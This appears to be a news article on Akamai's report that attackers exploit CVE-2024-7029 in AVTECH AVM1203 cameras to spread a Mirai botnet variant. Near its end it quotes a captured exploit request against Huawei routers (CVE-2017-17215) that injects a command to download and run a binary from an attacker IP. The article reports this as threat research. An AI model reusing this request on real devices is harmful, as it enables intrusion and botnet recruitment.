Malicious hackers are exploiting a critical vulnerability in a widely used surveillance camera to spread Mirai, a family of malware that injects infected IoT devices into large networks and from there is used to launch attacks that bring down websites and other internet-connected devices.
The attacks target the AVM1203, a surveillance device made by Taiwanese manufacturer AVTECH, network security provider Akamai said on Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, known as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day vulnerability.
Back then, a ragtag army shook the Internet
According to Akamai, attackers are exploiting the vulnerability to install a variant of Mirai. Mirai came to market in September 2016, when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained features that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to carry out distributed denial-of-service attacks of record-breaking scale. In the weeks that followed, the Mirai botnet carried out similar attacks on internet service providers and other targets. One such attack on dynamic domain name provider Dyn brought down large swathes of the internet. To complicate attempts to contain Mirai, its developers released the malware publicly. This allowed virtually anyone to create their own botnets that carried out DDoS attacks of once-unimaginable scale.
Kyle Lefton, a security researcher with Akamai's Security Intelligence and Response Team, said in an email that the attacker behind the attacks has carried out DDoS attacks against “various organizations” that he declined to name or describe. So far, the team has seen no evidence that the attackers are monitoring video feeds or using the infected cameras for other purposes.
Akamai discovered the activity using a “honeypot” of devices that mimic cameras on the open internet to observe any attacks targeting them. This technique did not allow researchers to measure the size of the botnet. The U.S. Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.
However, the technique has allowed Akamai to intercept the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when the exploit code became public. The zero-day is located in the “brightness argument in the 'action=' parameter” and allows command injection, the researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, was only officially acknowledged this month with the publication of CVE-2024-7029.
Wednesday’s post continued:
How does it work?
This vulnerability was originally discovered while examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
Decoded payloadFig. 1: Decoded payload body of the exploit attempts
The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).
What could happen?
In the exploit examples we observed, this is essentially what happened: The exploit of this vulnerability allows an attacker to execute remote code on a target system.
Figure 3 is an example of a threat actor exploiting this flaw to download and execute a JavaScript file to retrieve and load its main malware payload. Similar to many other botnets, this one also spreads a variant of the Mirai malware to its targets.
In this case, the botnet is likely using the Corona Mirai variant, which other vendors have already referred to in 2020 in connection with the COVID-19 virus.
When executed, the malware connects to a large number of hosts via Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).
Static analysis of the strings in the malware samples shows that the path /ctrlt/DeviceUpgrade_1 is used as a target to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\" $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
The botnet also targeted several other vulnerabilities, including Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities being exploited multiple times in the wild, and they continue to be successful.
Since this camera model is no longer supported, it is best for all users to replace it. As with all internet-connected devices, IoT devices should never be accessible using the default credentials provided.